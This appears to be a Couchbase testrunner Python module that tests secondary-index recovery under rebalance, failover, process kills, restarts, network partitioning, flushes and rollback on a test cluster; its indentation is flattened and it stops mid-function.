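#           caches_for_thread[alias] = create_connection(alias)
#       return caches_for_thread[alias]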
recovery_gsi.py
import logging
from threading import Thread
import time
from .base_gsi import BaseSecondaryIndexingTests
from couchbase.n1ql import CONSISTENCY_REQUEST
from couchbase_helper.query_definitions import QueryDefinition
from lib.memcached.helper.data_helper import MemcachedClientHelper
from membase.api.rest_client import RestConnection
from membase.helper.cluster_helper import ClusterOperationHelper
from remote.remote_util import RemoteMachineShellConnection
log = logging.getLogger(__name__)
class SecondaryIndexingRecoveryTests(BaseSecondaryIndexingTests):
def setUp(self):
self.use_replica = True
super(SecondaryIndexingRecoveryTests, self).setUp()
self.load_query_definitions = []
self.initial_index_number = self.input.param("initial_index_number", 10)
for x in range(self.initial_index_number):
index_name = "index_name_" + str(x)
query_definition = QueryDefinition(index_name=index_name, index_fields=["VMs"],
query_template="SELECT * FROM %s ", groups=["simple"],
index_where_clause=" VMs IS NOT NULL ")
self.load_query_definitions.append(query_definition)
if self.load_query_definitions:
self.multi_create_index(buckets=self.buckets,
query_definitions=self.load_query_definitions)
def tearDown(self):
if hasattr(self, 'query_definitions') and not self.skip_cleanup:
try:
self.log.info("<<<<<< WILL DROP THE INDEXES >>>>>")
tasks = self.async_multi_drop_index(
buckets=self.buckets, query_definitions=self.query_definitions)
for task in tasks:
task.result()
self.async_multi_drop_index(
buckets=self.buckets, query_definitions=self.load_query_definitions)
except Exception as ex:
log.info(ex)
super(SecondaryIndexingRecoveryTests, self).tearDown()
'''Test that checks if indexes that are ready during index warmup can be used'''
def test_use_index_during_warmup(self):
index_node = self.get_nodes_from_services_map(service_type="index",
get_all_nodes=False)
rest = RestConnection(index_node)
# Change indexer snapshot for a recovery point
doc = {"indexer.settings.persisted_snapshot.moi.interval": 60000}
rest.set_index_settings(doc)
create_index_query = "CREATE INDEX idx ON default(age)"
create_index_query2 = "CREATE INDEX idx1 ON default(age)"
create_index_query3 = "CREATE INDEX idx2 ON default(age)"
create_index_query4 = "CREATE INDEX idx3 ON default(age)"
create_index_query5 = "CREATE INDEX idx4 ON default(age)"
try:
self.n1ql_helper.run_cbq_query(query=create_index_query,
server=self.n1ql_node)
self.n1ql_helper.run_cbq_query(query=create_index_query2,
server=self.n1ql_node)
self.n1ql_helper.run_cbq_query(query=create_index_query3,
server=self.n1ql_node)
self.n1ql_helper.run_cbq_query(query=create_index_query4,
server=self.n1ql_node)
self.n1ql_helper.run_cbq_query(query=create_index_query5,
server=self.n1ql_node)
except Exception as ex:
self.log.info(str(ex))
self.fail(
"index creation failed with error : {0}".format(str(ex)))
self.wait_until_indexes_online()
rest.set_service_memoryQuota(service='indexMemoryQuota',
memoryQuota=256)
master_rest = RestConnection(self.master)
self.shell.execute_cbworkloadgen(master_rest.username, master_rest.password, 700000, 100, "default", 1024, '-j')
index_stats = rest.get_indexer_stats()
self.log.info(index_stats["indexer_state"])
self.assertTrue(index_stats["indexer_state"].lower() != 'warmup')
# Sleep for 60 seconds to allow a snapshot to be created
self.sleep(60)
t1 = Thread(target=self.monitor_index_stats, name="monitor_index_stats", args=([index_node, 60]))
t1.start()
shell = RemoteMachineShellConnection(index_node)
output1, error1 = shell.execute_command("killall -9 indexer")
t1.join()
use_index_query = "select * from default where age > 30"
# Results are not guaranteed to be accurate, so all we can check is that the query runs successfully
try:
results = self.n1ql_helper.run_cbq_query(query=use_index_query, server=self.n1ql_node)
except Exception as ex:
self.log.info(str(ex))
self.fail("query should run correctly, an index is available for use")
'''Ensure that the index is in warmup, but there is an index ready to be used'''
def monitor_index_stats(self, index_node=None, timeout=600):
index_usable = False
rest = RestConnection(index_node)
init_time = time.time()
next_time = init_time
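# Loop until either an index in the 'default' bucket reports status 'Ready'
# while the indexer is still in warmup, or (once the indexer has left warmup)
# the elapsed time exceeds the timeout.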
while not index_usable:
index_stats = rest.get_indexer_stats()
self.log.info(index_stats["indexer_state"])
index_map = self.get_index_map()
if index_stats["indexer_state"].lower() == 'warmup':
for index in index_map['default']:
if index_map['default'][index]['status'] == 'Ready':
index_usable = True
break
else:
next_time = time.time()
index_usable = index_usable or (next_time - init_time > timeout)
return
def test_rebalance_in(self):
pre_recovery_tasks = self.async_run_operations(phase="before")
self._run_tasks([pre_recovery_tasks])
self.get_dgm_for_plasma()
kvOps_tasks = self._run_kvops_tasks()
try:
rebalance = self.cluster.async_rebalance(
self.servers[:self.nodes_init],
self.nodes_in_list,
[], services=self.services_in)
mid_recovery_tasks = self.async_run_operations(
phase="in_between")
rebalance.result()
self._run_tasks([kvOps_tasks, mid_recovery_tasks])
# check if the nodes in cluster are healthy
msg = "Cluster not in Healthy state"
self.assertTrue(self.wait_until_cluster_is_healthy(), msg)
log.info("==== Cluster in healthy state ====")
self._check_all_bucket_items_indexed()
post_recovery_tasks = self.async_run_operations(phase="after")
self._run_tasks([post_recovery_tasks])
except Exception as ex:
log.info(str(ex))
raise
def test_rebalance_out(self):
pre_recovery_tasks = self.async_run_operations(phase="before")
self._run_tasks([pre_recovery_tasks])
self.get_dgm_for_plasma()
kvOps_tasks = self._run_kvops_tasks()
try:
# self._create_replica_indexes()
rebalance = self.cluster.async_rebalance(
self.servers[:self.nodes_init],
[], self.nodes_out_list)
mid_recovery_tasks = self.async_run_operations(phase="in_between")
rebalance.result()
self._run_tasks([kvOps_tasks, mid_recovery_tasks])
# check if the nodes in cluster are healthy
msg = "Cluster not in Healthy state"
self.assertTrue(self.wait_until_cluster_is_healthy(), msg)
log.info("==== Cluster in healthy state ====")
self._check_all_bucket_items_indexed()
post_recovery_tasks = self.async_run_operations(phase="after")
self._run_tasks([post_recovery_tasks])
except Exception as ex:
log.info(str(ex))
raise
def test_rebalance_in_out(self):
pre_recovery_tasks = self.async_run_operations(phase="before")
self._run_tasks([pre_recovery_tasks])
self.get_dgm_for_plasma()
kvOps_tasks = self._run_kvops_tasks()
try:
# self._create_replica_indexes()
rebalance = self.cluster.async_rebalance(
self.servers[:self.nodes_init], self.nodes_in_list,
self.nodes_out_list, services=self.services_in)
mid_recovery_tasks = self.async_run_operations(phase="in_between")
rebalance.result()
self._run_tasks([kvOps_tasks, mid_recovery_tasks])
# check if the nodes in cluster are healthy
msg = "Cluster not in Healthy state"
self.assertTrue(self.wait_until_cluster_is_healthy(), msg)
log.info("==== Cluster in healthy state ====")
self._check_all_bucket_items_indexed()
post_recovery_tasks = self.async_run_operations(phase="after")
self._run_tasks([post_recovery_tasks])
except Exception as ex:
log.info(str(ex))
raise
def test_rebalance_in_out_multi_nodes(self):
"""
MB-16220
1. Create cluster + Indexes
2. Run Queries
3. Rebalance out Data node and rebalance in Data node.
4. Rebalance out Index node and rebalance in Index node.
"""
try:
extra_nodes = self.servers[self.nodes_init:]
self.assertGreaterEqual(
len(extra_nodes), 2,
"Sufficient nodes not available for rebalance")
self.nodes_out = 1
self.nodes_in_list = [extra_nodes[0]]
self.nodes_out_dist = "kv:1"
self.services_in = ["kv"]
self.targetMaster = False
self.generate_map_nodes_out_dist()
pre_recovery_tasks = self.async_run_operations(phase="before")
self._run_tasks([pre_recovery_tasks])
self.get_dgm_for_plasma()
kvOps_tasks = self._run_kvops_tasks()
rebalance = self.cluster.async_rebalance(
self.servers[:self.nodes_init],
self.nodes_in_list,
self.nodes_out_list,
services=self.services_in)
mid_recovery_tasks = self.async_run_operations(phase="in_between")
rebalance.result()
# check if the nodes in cluster are healthy
msg = "Cluster not in Healthy state"
self.assertTrue(self.wait_until_cluster_is_healthy(), msg)
log.info("==== Cluster in healthy state ====")
self.nodes_out_dist = "index:1"
self.services_in = ["index"]
self.nodes_in_list = [extra_nodes[1]]
self.generate_map_nodes_out_dist()
# self._create_replica_indexes()
rebalance = self.cluster.async_rebalance(self.servers[:self.nodes_init],
self.nodes_in_list,
self.nodes_out_list, services=self.services_in)
rebalance.result()
self._run_tasks([kvOps_tasks, mid_recovery_tasks])
# check if the nodes in cluster are healthy
msg = "Cluster not in Healthy state"
self.assertTrue(self.wait_until_cluster_is_healthy(), msg)
log.info("==== Cluster in healthy state ====")
self._check_all_bucket_items_indexed()
post_recovery_tasks = self.async_run_operations(phase="after")
self._run_tasks([post_recovery_tasks])
except Exception as ex:
log.info(str(ex))
raise
def test_rebalance_with_stop_start(self):
pre_recovery_tasks = self.async_run_operations(phase="before")
self._run_tasks([pre_recovery_tasks])
self.get_dgm_for_plasma()
kvOps_tasks = self._run_kvops_tasks()
try:
# self._create_replica_indexes()
rebalance = self.cluster.async_rebalance(
self.servers[:self.nodes_init],
self.nodes_in_list,
self.nodes_out_list, services=self.services_in)
stopped = RestConnection(self.master).stop_rebalance(
wait_timeout=self.wait_timeout // 3)
self.assertTrue(stopped, msg="Unable to stop rebalance")
rebalance.result()
self.sleep(100)
rebalance = self.cluster.async_rebalance(
self.servers[:self.nodes_init], self.nodes_in_list,
self.nodes_out_list, services=self.services_in)
mid_recovery_tasks = self.async_run_operations(phase="in_between")
rebalance.result()
self._run_tasks([kvOps_tasks, mid_recovery_tasks])
# check if the nodes in cluster are healthy
msg = "Cluster not in Healthy state"
self.assertTrue(self.wait_until_cluster_is_healthy(), msg)
log.info("==== Cluster in healthy state ====")
self._check_all_bucket_items_indexed()
post_recovery_tasks = self.async_run_operations(phase="after")
self._run_tasks([post_recovery_tasks])
except Exception as ex:
log.info(str(ex))
raise
def test_server_crash(self):
pre_recovery_tasks = self.async_run_operations(phase="before")
self._run_tasks([pre_recovery_tasks])
self.get_dgm_for_plasma()
kvOps_tasks = self._run_kvops_tasks()
try:
self.use_replica = False
self._create_replica_indexes()
self.targetProcess = self.input.param("targetProcess", 'memcached')
for node in self.nodes_out_list:
remote = RemoteMachineShellConnection(node)
if self.targetProcess == "memcached":
remote.kill_memcached()
else:
remote.terminate_process(process_name=self.targetProcess)
self.sleep(60)
mid_recovery_tasks = self.async_run_operations(phase="in_between")
self._run_tasks([kvOps_tasks, mid_recovery_tasks])
# check if the nodes in cluster are healthy
msg = "Cluster not in Healthy state"
self.assertTrue(self.wait_until_cluster_is_healthy(), msg)
log.info("==== Cluster in healthy state ====")
self._check_all_bucket_items_indexed()
post_recovery_tasks = self.async_run_operations(phase="after")
self._run_tasks([post_recovery_tasks])
except Exception as ex:
log.info(str(ex))
raise
def test_server_stop(self):
if self.doc_ops:
return
pre_recovery_tasks = self.async_run_operations(phase="before")
self._run_tasks([pre_recovery_tasks])
self.get_dgm_for_plasma()
kvOps_tasks = self._run_kvops_tasks()
try:
self._create_replica_indexes()
for node in self.nodes_out_list:
remote = RemoteMachineShellConnection(node)
remote.stop_server()
mid_recovery_tasks = self.async_run_operations(phase="in_between")
self._run_tasks([kvOps_tasks, mid_recovery_tasks])
post_recovery_tasks = self.async_run_operations(phase="after")
self._run_tasks([post_recovery_tasks])
except Exception as ex:
log.info(str(ex))
raise
finally:
for node in self.nodes_out_list:
remote = RemoteMachineShellConnection(node)
remote.start_server()
self.sleep(20)
def test_server_restart(self):
pre_recovery_tasks = self.async_run_operations(phase="before")
self._run_tasks([pre_recovery_tasks])
self.get_dgm_for_plasma()
kvOps_tasks = self._run_kvops_tasks()
try:
for node in self.nodes_out_list:
remote = RemoteMachineShellConnection(node)
remote.stop_server()
self.sleep(30)
for node in self.nodes_out_list:
remote = RemoteMachineShellConnection(node)
remote.start_server()
self.sleep(30)
mid_recovery_tasks = self.async_run_operations(phase="in_between")
self._run_tasks([kvOps_tasks, mid_recovery_tasks])
# check if the nodes in cluster are healthy
msg = "Cluster not in Healthy state"
self.assertTrue(self.wait_until_cluster_is_healthy(), msg)
log.info("==== Cluster in healthy state ====")
self._check_all_bucket_items_indexed()
post_recovery_tasks = self.async_run_operations(phase="after")
self._run_tasks([post_recovery_tasks])
except Exception as ex:
log.info(str(ex))
raise
def test_failover(self):
pre_recovery_tasks = self.async_run_operations(phase="before")
self._run_tasks([pre_recovery_tasks])
self.get_dgm_for_plasma()
kvOps_tasks = self._run_kvops_tasks()
try:
self._create_replica_indexes()
servr_out = self.nodes_out_list
failover_task = self.cluster.async_failover(
[self.master],
failover_nodes=servr_out,
graceful=self.graceful)
mid_recovery_tasks = self.async_run_operations(phase="in_between")
failover_task.result()
if self.graceful:
# Check if rebalance is still running
msg = "graceful failover failed for nodes"
check_rblnc = RestConnection(self.master).monitorRebalance(
stop_if_loop=True)
self.assertTrue(check_rblnc, msg=msg)
self._run_tasks([kvOps_tasks, mid_recovery_tasks])
rebalance = self.cluster.async_rebalance(
self.servers[:self.nodes_init], [], servr_out)
rebalance.result()
# check if the nodes in cluster are healthy
msg = "Cluster not in Healthy state"
self.assertTrue(self.wait_until_cluster_is_healthy(), msg)
log.info("==== Cluster in healthy state ====")
self._check_all_bucket_items_indexed()
post_recovery_tasks = self.async_run_operations(phase="after")
self._run_tasks([post_recovery_tasks])
except Exception as ex:
log.info(str(ex))
raise
def test_failover_add_back(self):
try:
rest = RestConnection(self.master)
recoveryType = self.input.param("recoveryType", "full")
servr_out = self.nodes_out_list
failover_task = self.cluster.async_failover([self.master],
failover_nodes=servr_out, graceful=self.graceful)
failover_task.result()
pre_recovery_tasks = self.async_run_operations(phase="before")
self._run_tasks([pre_recovery_tasks])
self.get_dgm_for_plasma()
kvOps_tasks = self._run_kvops_tasks()
nodes_all = rest.node_statuses()
nodes = []
if servr_out[0].ip == "127.0.0.1":
for failover_node in servr_out:
nodes.extend([node for node in nodes_all
if (str(node.port) == failover_node.port)])
else:
for failover_node in servr_out:
nodes.extend([node for node in nodes_all
if node.ip == failover_node.ip])
for node in nodes:
log.info("Adding Back: {0}".format(node))
rest.add_back_node(node.id)
rest.set_recovery_type(otpNode=node.id,
recoveryType=recoveryType)
rebalance = self.cluster.async_rebalance(
self.servers[:self.nodes_init], [], [])
mid_recovery_tasks = self.async_run_operations(phase="in_between")
rebalance.result()
self._run_tasks([kvOps_tasks, mid_recovery_tasks])
# check if the nodes in cluster are healthy
msg = "Cluster not in Healthy state"
self.assertTrue(self.wait_until_cluster_is_healthy(), msg)
log.info("==== Cluster in healthy state ====")
self._check_all_bucket_items_indexed()
post_recovery_tasks = self.async_run_operations(phase="after")
self._run_tasks([post_recovery_tasks])
except Exception as ex:
log.info(str(ex))
raise
def test_failover_indexer_add_back(self):
"""
Indexer add back scenarios
:return:
"""
rest = RestConnection(self.master)
recoveryType = self.input.param("recoveryType", "full")
indexer_out = int(self.input.param("nodes_out", 0))
nodes = self.get_nodes_from_services_map(service_type="index",
get_all_nodes=True)
self.assertGreaterEqual(len(nodes), indexer_out,
"Existing Indexer Nodes less than Indexer out nodes")
pre_recovery_tasks = self.async_run_operations(phase="before")
self._run_tasks([pre_recovery_tasks])
self.get_dgm_for_plasma()
kvOps_tasks = self._run_kvops_tasks()
try:
self.use_replica = False
self._create_replica_indexes()
servr_out = nodes[:indexer_out]
failover_task = self.cluster.async_failover(
[self.master], failover_nodes=servr_out,
graceful=self.graceful)
failover_task.result()
nodes_all = rest.node_statuses()
nodes = []
if servr_out[0].ip == "127.0.0.1":
for failover_node in servr_out:
nodes.extend([node for node in nodes_all
if (str(node.port) == failover_node.port)])
else:
for failover_node in servr_out:
nodes.extend([node for node in nodes_all
if node.ip == failover_node.ip])
for node in nodes:
log.info("Adding back {0} with recovery type {1}...".format(
node.ip, recoveryType))
rest.add_back_node(node.id)
rest.set_recovery_type(otpNode=node.id,
recoveryType=recoveryType)
log.info("Rebalancing nodes in...")
mid_recovery_tasks = self.async_run_operations(phase="in_between")
rebalance = self.cluster.async_rebalance(
self.servers[:self.nodes_init], [], [])
rebalance.result()
self._run_tasks([mid_recovery_tasks, kvOps_tasks])
# check if the nodes in cluster are healthy
msg = "Cluster not in Healthy state"
self.assertTrue(self.wait_until_cluster_is_healthy(), msg)
log.info("==== Cluster in healthy state ====")
self._check_all_bucket_items_indexed()
post_recovery_tasks = self.async_run_operations(phase="after")
self._run_tasks([post_recovery_tasks])
except Exception as ex:
log.info(str(ex))
raise
def test_failover_indexer_restart(self):
"""
CBQE-3153
Indexer add back scenarios
:return:
"""
index_servers = self.get_nodes_from_services_map(service_type="index",
get_all_nodes=True)
self.multi_create_index(self.buckets, self.query_definitions)
self.get_dgm_for_plasma()
self.sleep(30)
kvOps_tasks = self._run_kvops_tasks()
remote = RemoteMachineShellConnection(index_servers[0])
remote.stop_server()
self.sleep(20)
for bucket in self.buckets:
for query in self.query_definitions:
try:
self.query_using_index(bucket=bucket,
query_definition=query)
except Exception as ex:
msg = "queryport.indexNotFound"
if msg in str(ex):
continue
else:
log.info(str(ex))
break
remote.start_server()
self.sleep(20)
self._run_tasks([kvOps_tasks])
def test_autofailover(self):
pre_recovery_tasks = self.async_run_operations(phase="before")
self._run_tasks([pre_recovery_tasks])
self.get_dgm_for_plasma()
kvOps_tasks = self._run_kvops_tasks()
autofailover_timeout = 30
conn = RestConnection(self.master)
status = conn.update_autofailover_settings(True, autofailover_timeout)
self.assertTrue(status, 'failed to change autofailover_settings!')
try:
self._create_replica_indexes()
servr_out = self.nodes_out_list
remote = RemoteMachineShellConnection(servr_out[0])
remote.stop_server()
self.sleep(10)
mid_recovery_tasks = self.async_run_operations(phase="in_between")
self.sleep(autofailover_timeout + 10, "Wait for autofailover")
rebalance = self.cluster.async_rebalance(
self.servers[:self.nodes_init], [], servr_out)
rebalance.result()
self._run_tasks([kvOps_tasks, mid_recovery_tasks])
# check if the nodes in cluster are healthy
msg = "Cluster not in Healthy state"
self.assertTrue(self.wait_until_cluster_is_healthy(), msg)
log.info("==== Cluster in healthy state ====")
self._check_all_bucket_items_indexed()
post_recovery_tasks = self.async_run_operations(phase="after")
self._run_tasks([post_recovery_tasks])
except Exception as ex:
log.info(str(ex))
raise
finally:
remote.start_server()
self.sleep(30)
def test_network_partitioning(self):
pre_recovery_tasks = self.async_run_operations(phase="before")
self._run_tasks([pre_recovery_tasks])
self.get_dgm_for_plasma()
kvOps_tasks = self._run_kvops_tasks()
try:
self._create_replica_indexes()
for node in self.nodes_out_list:
self.start_firewall_on_node(node)
self.sleep(60)
mid_recovery_tasks = self.async_run_operations(phase="in_between")
self._run_tasks([kvOps_tasks, mid_recovery_tasks])
post_recovery_tasks = self.async_run_operations(phase="after")
self._run_tasks([post_recovery_tasks])
except Exception as ex:
log.info(str(ex))
raise
finally:
for node in self.nodes_out_list:
self.stop_firewall_on_node(node)
self.sleep(30)
# check if the nodes in cluster are healthy
msg = "Cluster not in Healthy state"
self.assertTrue(self.wait_until_cluster_is_healthy(), msg)
log.info("==== Cluster in healthy state ====")
self._check_all_bucket_items_indexed()
def test_couchbase_bucket_compaction(self):
"""
Run Compaction Here
Run auto-compaction to remove the tombstones
"""
pre_recovery_tasks = self.async_run_operations(phase="before")
self._run_tasks([pre_recovery_tasks])
self.get_dgm_for_plasma()
kvOps_tasks = self._run_kvops_tasks()
compact_tasks = []
for bucket in self.buckets:
compact_tasks.append(self.cluster.async_compact_bucket(
self.master, bucket))
mid_recovery_tasks = self.async_run_operations(phase="in_between")
self._run_tasks([kvOps_tasks, mid_recovery_tasks])
for task in compact_tasks:
task.result()
self._check_all_bucket_items_indexed()
post_recovery_tasks = self.async_run_operations(phase="after")
self._run_tasks([post_recovery_tasks])
def test_warmup(self):
pre_recovery_tasks = self.async_run_operations(phase="before")
self._run_tasks([pre_recovery_tasks])
self.get_dgm_for_plasma()
kvOps_tasks = self._run_kvops_tasks()
for server in self.nodes_out_list:
remote = RemoteMachineShellConnection(server)
remote.stop_server()
remote.start_server()
remote.disconnect()
mid_recovery_tasks = self.async_run_operations(phase="in_between")
ClusterOperationHelper.wait_for_ns_servers_or_assert(self.servers, self)
self._run_tasks([kvOps_tasks, mid_recovery_tasks])
# check if the nodes in cluster are healthy
msg = "Cluster not in Healthy state"
self.assertTrue(self.wait_until_cluster_is_healthy(), msg)
log.info("==== Cluster in healthy state ====")
self._check_all_bucket_items_indexed()
post_recovery_tasks = self.async_run_operations(phase="after")
self._run_tasks([post_recovery_tasks])
def test_couchbase_bucket_flush(self):
pre_recovery_tasks = self.async_run_operations(phase="before")
self._run_tasks([pre_recovery_tasks])
self.get_dgm_for_plasma()
kvOps_tasks = self._run_kvops_tasks()
# Flush the bucket
for bucket in self.buckets:
log.info("Flushing bucket {0}...".format(bucket.name))
rest = RestConnection(self.master)
rest.flush_bucket(bucket.name)
count = 0
while rest.get_bucket_status(bucket.name) != "healthy" and \
count < 10:
log.info("Bucket {0} Status is {1}. Sleeping...".format(
bucket.name, rest.get_bucket_status(bucket.name)))
count += 1
self.sleep(10)
log.info("Bucket {0} is {1}".format(
bucket.name, rest.get_bucket_status(bucket.name)))
mid_recovery_tasks = self.async_run_operations(phase="in_between")
self._run_tasks([kvOps_tasks, mid_recovery_tasks])
# check if the nodes in cluster are healthy
msg = "Cluster not in Healthy state"
self.assertTrue(self.wait_until_cluster_is_healthy(), msg)
log.info("==== Cluster in healthy state ====")
self.sleep(180)
self._check_all_bucket_items_indexed()
post_recovery_tasks = self.async_run_operations(phase="after")
self.sleep(180)
self._run_tasks([post_recovery_tasks])
def test_robust_rollback_handling_in_failure_scenario(self):
"""
MB-36582
TODO:
"https://issues.couchbase.com/browse/MB-37586
https://issues.couchbase.com/browse/MB-37588
Will wait on the stats to be available
https://issues.couchbase.com/browse/MB-37594
"""
data_nodes = self.get_kv_nodes()
self.assertTrue(len(data_nodes) >= 3, "Can't run this with less than 3 KV nodes")
bucket_name = self.buckets[0].name
index_name = list(self.get_index_map()[bucket_name])[0]
index_node = self.get_nodes_from_services_map(service_type="index",
get_all_nodes=False)
rest = RestConnection(index_node)
# Change indexer snapshot for a recovery point
doc = {"indexer.settings.persisted_snapshot.moi.interval": 60000}
rest.set_index_settings(doc)
# Deleting bucket as there is no easy way in testrunner to create index before loading data
for bucket in self.buckets:
self.cluster.bucket_delete(self.master, bucket=bucket)
# Create default bucket
default_params = self._create_bucket_params(
server=self.master, size=self.bucket_size,
replicas=self.num_replicas, bucket_type=self.bucket_type,
enable_replica_index=self.enable_replica_index,
eviction_policy=self.eviction_policy, lww=self.lww,
maxttl=self.maxttl, compression_mode=self.compression_mode)
self.cluster.create_default_bucket(default_params)
# loading data to bucket
gens_load = self.generate_docs(num_items=self.docs_per_day)
self.load(gens_load, flag=self.item_flag, batch_size=self.batch_size, op_type="create", verify_data=False)
# creating Index
query_definition = QueryDefinition(index_name=index_name, index_fields=["VMs"],
query_template="SELECT * FROM %s ", groups=["simple"],
index_where_clause=" VMs IS NOT NULL ")
self.load_query_definitions.append(query_definition)
self.create_index(bucket="default", query_definition=query_definition)
node_b, node_c = (None, None)
for node in data_nodes:
if node.ip == self.master.ip:
continue
if not node_b:
node_b = node
else:
node_c = node
break
# Blocking Node C from Node B
try:
self.block_incoming_network_from_node(node_b, node_c)
# Killing Memcached on Node C so that disk snapshots carry a vbuuid that is not available on Node B
for _ in range(2):
# Killing memcached on node C
num_snapshot = rest.get_index_stats()[bucket_name][index_name]["num_commits"]
remote_client = RemoteMachineShellConnection(node_c)
remote_client.kill_memcached()
remote_client.disconnect()
sleep_count = 0
while sleep_count < 10:
self.sleep(10, "Waiting for Disk Snapshot/s to be available")
new_num_snapshot = rest.get_index_stats()[bucket_name][index_name]["num_commits"]
if new_num_snapshot > num_snapshot:
self.log.info("New Disk Snapshot is available")
break
sleep_count += 1
# Restarting Indexer to clear in-memory snapshots
remote_client = RemoteMachineShellConnection(index_node)
remote_client.execute_command("kill -9 $(ps aux | pgrep 'indexer')")
self.sleep(timeout=10, message="Allowing time for indexer to restart")
# Fail over Node C so that replica takes over on Node B
self.cluster.failover(servers=self.servers, failover_nodes=[node_c])
self.sleep(timeout=30, message="Waiting for rollback to kick in")
# Get rollback count
num_rollback = rest.get_num_rollback_stat(bucket="default")
self.assertEqual(num_rollback, 1, "Failed to rollback in failure scenario")
# Todo: add validation that the rollback has happened from snapshot not from Zero
finally:
self.resume_blocked_incoming_network_from_node(node_b, node_c)
def test_discard_disk_snapshot_after_kv_persisted(self):
"""
MB-36554
Todo: https://issues.couchbase.com/browse/MB-37586
Will wait on the stats to be available
https://issues.couchbase.com/browse/MB-37587
"""
data_nodes = self.get_kv_nodes()
self.assertTrue(len(data_nodes) == 2, "This test requires a cluster of 2 nodes")
bucket_name = self.buckets[0].name
index_name = list(self.get_index_map()[bucket_name])[0]
index_node = self.get_nodes_from_services_map(service_type="index",
get_all_nodes=False)
rest = RestConnection(index_node)
# Change indexer snapshot for a recovery point
doc = {"indexer.settings.persisted_snapshot.moi.interval": 60000}
rest.set_index_settings(doc)
# Deleting bucket as there is no easy way in testrunner to create index before loading data
for bucket in self.buckets:
self.cluster.bucket_delete(self.master, bucket=bucket)
# Create default bucket
default_params = self._create_bucket_params(
server=self.master, size=self.bucket_size,
replicas=self.num_replicas, bucket_type=self.bucket_type,
enable_replica_index=self.enable_replica_index,
eviction_policy=self.eviction_policy, lww=self.lww,
maxttl=self.maxttl, compression_mode=self.compression_mode)
self.cluster.create_default_bucket(default_params)
# loading data to bucket
gens_load = self.generate_docs(num_items=self.docs_per_day)
self.load(gens_load, flag=self.item_flag, batch_size=self.batch_size, op_type="create", verify_data=False)
# creating Index
query_definition = QueryDefinition(index_name=index_name, index_fields=["VMs"],
query_template="SELECT * FROM %s ", groups=["simple"],
index_where_clause=" VMs IS NOT NULL ")
self.load_query_definitions.append(query_definition)
self.create_index(bucket="default", query_definition=query_definition)
# Blocking node B firewall
node_b, node_c = data_nodes
try:
self.block_incoming_network_from_node(node_b, node_c)
# Performing doc mutation
num_snapshot = rest.get_index_stats()[bucket_name][index_name]["num_commits"]
gens_load = self.generate_docs(self.docs_per_day * 2)
self.load(gens_load, flag=self.item_flag, verify_data=False, batch_size=self.batch_size)
sleep_count = 0
while sleep_count < 10:
self.sleep(10, "Waiting for Disk Snapshot/s to be available")
new_num_snapshot = rest.get_index_stats()[bucket_name][index_name]["num_commits"]
if new_num_snapshot > num_snapshot:
self.log.info("New Disk Snapshot is available")
break
sleep_count += 1
# Performing doc mutation
num_snapshot = rest.get_index_stats()[bucket_name][index_name]["num_commits"]
gens_load = self.generate_docs(self.docs_per_day * 3)
self.load(gens_load, flag=self.item_flag, verify_data=False, batch_size=self.batch_size)
sleep_count = 0
while sleep_count < 10:
self.sleep(10, "Waiting for Disk Snapshot/s to be available")
new_num_snapshot = rest.get_index_stats()[bucket_name][index_name]["num_commits"]
if new_num_snapshot > num_snapshot:
self.log.info("New Disk Snapshot is available")
break
sleep_count += 1
# resume the communication between node B and node C
finally:
self.resume_blocked_incoming_network_from_node(node_b, node_c)
# TODO: Need to add validation based on stat that the Disk Snapshot has caught up and extra snapshots are deleted
# Meanwhile we will validate based on the item_count
self.sleep(timeout=2 * 60, message="Giving the indexer some time to recover after resuming communication "
"between node B and node C")
item_count_after_checking_kv_persisted_seq_num = rest.get_index_stats()[bucket_name][index_name]["items_count"]
self.assertEqual(item_count_after_checking_kv_persisted_seq_num, self.docs_per_day * 3 * 2016,
"Indexer failed to index all the items in bucket.\nExpected indexed item {}"
"\n Actual indexed item {}".format(item_count_after_checking_kv_persisted_seq_num,
self.docs_per_day * 3 * 2016))
def test_rollback_to_zero_preceded_by_rollback_from_disk_snapshot(self):
"""
MB36444
"""
bucket_name = self.buckets[0].name
index_name = list(self.get_index_map()[bucket_name])[0]
data_nodes = self.get_kv_nodes()
self.assertTrue(len(data_nodes) >= 3, "Can't run this with less than 3 KV nodes")
# Blocking node B firewall
node_b, node_c = (None, None)
for node in data_nodes:
if node.ip == self.master.ip:
continue
if not node_b:
node_b = node
else:
node_c = node
break
try:
# Blocking communication between Node B and Node C
conn = RestConnection(self.master)
self.block_incoming_network_from_node(node_b, node_c)
# Doing some mutation which replica on Node C won't see
gens_load = self.generate_docs(num_items=self.docs_per_day * 2)
self.load(gens_load, flag=self.item_flag, batch_size=self.batch_size, op_type="create", verify_data=False)
# Failing over Node C
self.cluster.failover(servers=self.servers, failover_nodes=[node_c])
sleep_count = 0
while sleep_count < 15:
num_rollback = conn.get_num_rollback_stat(bucket=bucket_name)
if num_rollback == 1:
self.log.info("Indexer has rolled back from disk snapshot")
break
self.sleep(10, "Waiting for rollback to disk snapshot")
sleep_count += 1
self.assertNotEqual(sleep_count, 15, "Rollback to disk snapshot didn't happen")
# Change indexer snapshot for a recovery point
doc = {"indexer.settings.persisted_snapshot.moi.interval": 60000}
conn.set_index_settings(doc)
# Doing some mutation so that two new disk snapshots are generated
num_snapshot = conn.get_index_stats()[bucket_name][index_name]["num_commits"]
gens_load = self.generate_docs(num_items=self.docs_per_day * 3)
self.load(gens_load, flag=self.item_flag, batch_size=self.batch_size, op_type="create", verify_data=False)
sleep_count = 0
while sleep_count < 10:
self.sleep(10, "Waiting for Disk Snapshot/s to be available")
new_num_snapshot = conn.get_index_stats()[bucket_name][index_name]["num_commits"]
if new_num_snapshot > num_snapshot:
self.log.info("New Disk Snapshot is available")
break
sleep_count += 1
self.assertNotEqual(sleep_count, 10, "No new Disk Snapshot is available")
num_snapshot = conn.get_index_stats()[bucket_name][index_name]["num_commits"]
gens_load = self.generate_docs(num_items=self.docs_per_day * 4)
self.load(gens_load, flag=self.item_flag, batch_size=self.batch_size, op_type="create", verify_data=False)
sleep_count = 0
while sleep_count < 10:
self.sleep(10, "Waiting for Disk Snapshot/s to be available")
new_num_snapshot = conn.get_index_stats()[bucket_name][index_name]["num_commits"]
if new_num_snapshot > num_snapshot:
self.log.info("New Disk Snapshot is available")
break
sleep_count += 1
self.assertNotEqual(sleep_count, 10, "No new Disk Snapshot is available")
# Performing full recovery for fail over Node C
self.resume_blocked_incoming_network_from_node(node_b, node_c)
conn.set_recovery_type(otpNode='ns_1@' + node_c.ip, recoveryType="full")
self.cluster.rebalance(self.servers, [], [])
# Blocking communication between Node B and Node C
conn = RestConnection(self.master)
